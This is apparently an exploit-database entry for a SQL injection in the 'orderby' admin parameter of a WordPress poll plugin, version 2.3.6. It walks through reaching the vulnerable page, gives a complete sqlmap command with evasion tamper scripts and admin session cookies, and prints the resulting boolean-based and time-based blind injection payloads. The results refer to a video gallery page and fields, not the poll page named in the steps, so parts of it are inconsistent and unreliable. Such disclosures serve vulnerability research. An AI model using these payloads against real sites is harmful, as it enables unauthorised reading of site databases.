<pre><code># Exploit Title: WordPress Poll Plugin SQL Injection # Date: 2024-07-06 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://total-soft.com/wp-poll/ # Version 2.3.6 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `TS Poll > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1 ``` 2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc 3. Search for orderby parameter. ## SQLMAP COMMAND python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \ --batch \ --dbms=mysql \ --thread=10 \ --no-cast \ --random-agent \ -v 3 \ --tamper="between,randomcase,space2comment" \ --level=5 \ --risk=3 \ -p orderby \ --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472" ## RESULT --- Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- </code></pre>